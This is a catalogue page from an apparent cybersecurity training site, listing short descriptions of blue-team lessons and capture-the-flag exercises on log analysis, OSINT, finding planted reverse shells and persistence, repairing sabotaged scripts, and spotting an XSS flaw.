Practice Blue-team
Lessons, exercises, and projects about blue-team
Browse our list of curated database of projects, exercises, and lessons to learn blue-team
An incident is not solved with commands, but with reasoning. This article explores the key skills every analyst must develop to face real attacks: from log analysis to binary interpretation, including persistence, event correlation, and investigative mindset.
This article takes you on a digital hunting mission where there is no malware or clear alerts, only subtle clues hidden in the data. You will learn to use Python to filter names, identify patterns, and apply conditional logic like a true forensic analyst. The goal: find an impostor among a list of identities, and decode a hidden base64 message. A lesson on how defense can also be an active search for the truth.
1hrs average
Analyze a .pcap file containing a suspicious HTTP transaction, find a Base64-encoded string, and decode the flag.
1hrs average
Analyze a seemingly anonymous photo to determine the city and country where it was taken. Use OSINT techniques to validate the flag.
1hrs average
A Linux server has been compromised and multiple hidden reverse shells were planted. Your job as an analyst is to detect and remove them.
1hrs average
Investigate a compromised website to detect a hidden reverse shell. Find the backdoor and validate your discovery.
Ready to dive into Cybersecurity? Join our waiting list for an intensive bootcamp, master ethical hacking, and build a standout portfolio for your InfoSec career!
This article immerses you in an Ubuntu server where nothing is as it seems. Your mission is to identify a malicious user acting from within, manipulating scheduled tasks and leaving traces in the system. You'll learn to navigate the file system, inspect processes, review firewall rules, and analyze cron jobs for suspicious activity. An experience that challenges both your technical knowledge and your deductive skills.
In this article, you dive into the art of reading code as a tool for cyber defense. It's not just about finding errors, but about detecting subtle alterations that could indicate an attack. You will learn the fundamentals of Python, understand how attackers manipulate scripts, and train your mind to restore the original intent of the code. This is an exercise in analysis, logic, and active listening: code also speaks, if you know how to read it.
1hrs average
You’ve recovered a suspicious string. Your goal is to decrypt it using a classic cipher method called Atbash and validate your result using a script. Only if you decrypt it correctly will you receive the final reward.
1hrs average
A user known as johnclick1337 posted a threat before disappearing. Use OSINT techniques to uncover his email and validate the flag.
2hrs average
Face an internal sabotage that has taken down the main web service. Investigate, escalate privileges, and unmask the imposter to restore operability.
1hrs average
Analyze and repair a Python script sabotaged by an internal attacker to recover the original password. Once fixed, validate it and decode a flag using CyberChef.
Explore the world of Endpoint Detection and Response (EDR) systems, focusing on advanced threat detection and real-time response to safeguard modern businesses. Learn how EDR provides proactive protection, using monitoring, machine learning, and automation to detect and address security risks efficiently.
This article immerses you in a cyber defense challenge with a deeply human focus: rescuing a lost agent through clues hidden in code. You'll learn to deduce geographic information with Python, generate custom dictionaries, use Hydra to automate controlled attacks, and decode base64 messages. More than a technical exercise, it's a lesson in how cybersecurity also involves empathy, ingenuity, and commitment to those who trust us to protect them.
1hrs average
A Linux system has been compromised. Your mission is to investigate a suspicious image, track the attacker, and uncover hidden persistence tasks. Only by cleaning the system correctly will you be able to reconstruct the final flag.
1hrs average
You’ve received a suspicious executable. Your task is to decompile it, identify the malicious behavior, and clean the binary. Only by successfully removing the malicious activity will the program execute fully and reveal a message that contains the flag.
1hrs average
A critical database backup was found damaged. As an analyst, your task is to recover usable data and find the flag.
1hrs average
Analyze a vulnerable form in a fictional licensing site, identify the XSS vulnerability, and validate your finding with a script.
1hrs average
Analyze a suspicious script, deduce the criminal's name from clues, and decode a flag using CyberChef.